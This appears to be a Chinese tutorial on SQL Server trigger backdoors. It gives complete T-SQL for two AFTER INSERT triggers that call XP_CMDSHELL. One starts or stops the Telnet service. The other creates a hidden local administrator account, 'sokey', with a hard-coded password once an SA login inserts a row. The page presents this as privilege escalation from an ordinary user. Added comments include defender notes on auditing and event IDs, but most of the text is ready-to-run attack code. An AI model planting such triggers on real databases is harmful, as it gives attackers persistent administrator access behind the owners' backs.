1.创建一个表
-- Two-column table that the AFTER INSERT trigger shown later on this page is attached to.
-- The table holds no real data; inserts into it only serve to fire that trigger.
CREATE TABLE backdoor
(
    LASTNAME  VARCHAR(10),
    FIRSTNAME VARCHAR(10)
)
2.创建一个后触发器(AFTER INSERT):当插入的LASTNAME字段中包含OPEN时开启TELNET,包含CLOSE时关闭TELNET。
-- TR_HACKER2: AFTER INSERT trigger on the backdoor table that turns inserted
-- text into OS service commands (start or stop of the Telnet service).
-- No EXECUTE AS clause is present, so the body runs in the security context
-- of whoever performs the INSERT. SP_ADDEXTENDEDPROC and XP_CMDSHELL normally
-- require sysadmin, so the OS commands only succeed when a sysadmin-level
-- login writes to the table.
-- Defender notes:
--   * Audit trigger bodies (sys.triggers joined to sys.sql_modules) for
--     references to XP_CMDSHELL or SP_ADDEXTENDEDPROC.
--   * Keep xp_cmdshell disabled through sp_configure where it is not needed,
--     and limit who may create or alter triggers on tables that privileged
--     logins write to.
--   * On the host, a command shell spawned by the SQL Server service process
--     and an unexpected Telnet service state change (Service Control Manager
--     event 7036) are the observable side effects.
-- NOTE(review): the XPLOG70.DLL / XPSQL70.DLL registration looks specific to
-- older SQL Server releases; confirm against the version in scope.
CREATE TRIGGER TR_HACKER2 ON backdoor
AFTER INSERT
AS
BEGIN
-- @P receives the LASTNAME value read from the INSERTED pseudo-table.
DECLARE @P VARCHAR(50)
SELECT @P=(SELECT LASTNAME FROM INSERTED)
-- Runs on every firing, before any pattern check: registers XP_CMDSHELL from XPLOG70.DLL.
EXECUTE SP_ADDEXTENDEDPROC 'MASTER.DBO.XP_CMDSHELL','XPLOG70.DLL'--'XPSQL70.DLL'
-- LASTNAME containing OPEN: the Telnet service is started through the OS shell.
IF(@P LIKE '%OPEN%')
EXECUTE MASTER.DBO.XP_CMDSHELL 'NET START TELNET'
-- LASTNAME containing CLOSE: the Telnet service is stopped again.
ELSE IF(@P LIKE '%CLOSE%')
EXECUTE MASTER.DBO.XP_CMDSHELL 'NET STOP TELNET'
END
3.插入字符。这里TELNET没有启动,是因为触发器匹配的是LASTNAME字段,只有LASTNAME为open时才会启动,别的字符都不行。
-- LASTNAME is '111' here, so neither LIKE branch of TR_HACKER2 matches and
-- no NET command is issued; 'open' sits in FIRSTNAME, which the trigger never reads.
INSERT INTO backdoor (LASTNAME, FIRSTNAME)
VALUES ('111', 'open')
4.插入字符(这次LASTNAME为open)
-- LASTNAME is 'open' here, the value TR_HACKER2 compares against '%OPEN%'.
-- NOTE(review): the lower-case value only matches the upper-case pattern under
-- a case-insensitive collation; confirm the collation in use.
INSERT INTO backdoor (LASTNAME, FIRSTNAME)
VALUES ('open', '111')
触发器提升权限
普通用户提升系统权限
1.创建一个表
-- Same two-column table as in the first example; it exists only so that the
-- trigger defined next on this page has an object to attach to.
CREATE TABLE backdoor
(
    LASTNAME  VARCHAR(10),
    FIRSTNAME VARCHAR(10)
)
2.创建一个触发器:当有任何字符插入到这个表中时,在系统中建立超级用户。
-- TR_HACKER1: AFTER INSERT trigger on the backdoor table that, on any insert,
-- issues OS commands to create a local Windows account and add it to the
-- local Administrators group. Unlike TR_HACKER2 it inspects no column value.
-- No EXECUTE AS clause is present, so the body runs in the security context
-- of the inserting login. SP_ADDEXTENDEDPROC and XP_CMDSHELL normally require
-- sysadmin, so the commands only succeed when a sysadmin-level login performs
-- the insert.
-- Defender notes:
--   * Audit trigger bodies (sys.triggers joined to sys.sql_modules) for
--     references to XP_CMDSHELL or SP_ADDEXTENDEDPROC, and restrict who may
--     create or alter triggers in databases that administrators write to.
--   * Keep xp_cmdshell disabled through sp_configure where it is not needed,
--     and run the SQL Server service under a low-privileged account so that
--     shell commands cannot manage local users.
--   * On the host, Windows Security events 4720 (account created) and 4732
--     (member added to a local group), together with a command shell spawned
--     by the SQL Server service process, are the observable side effects.
create TRIGGER TR_HACKER1 ON backdoor
AFTER INSERT
AS
BEGIN
-- Runs on every firing: registers XP_CMDSHELL from XPLOG70.DLL.
EXECUTE SP_ADDEXTENDEDPROC 'MASTER.DBO.XP_CMDSHELL','XPLOG70.DLL'--'XPSQL70.DLL'
-- Creates a local account with a hard-coded password via the OS shell.
EXECUTE MASTER.DBO.XP_CMDSHELL 'net user sokey 123456 /add'
-- Adds that account to the local Administrators group.
EXECUTE MASTER.DBO.XP_CMDSHELL 'net localgroup administrators sokey /add'
end
现在只等SA登录并向该表插入任意字符。触发器是以执行插入操作的登录身份运行的,所以只有SA这样具有sysadmin权限的登录插入数据时,其中的XP_CMDSHELL才能执行。一般数据库为了保证安全,会由两个用户来管理。
3.插入字符(以SA身份)
-- Any row fires TR_HACKER1 because the trigger checks no column value;
-- the page has this insert performed by the sa login.
INSERT INTO backdoor (LASTNAME, FIRSTNAME)
VALUES ('open', '111')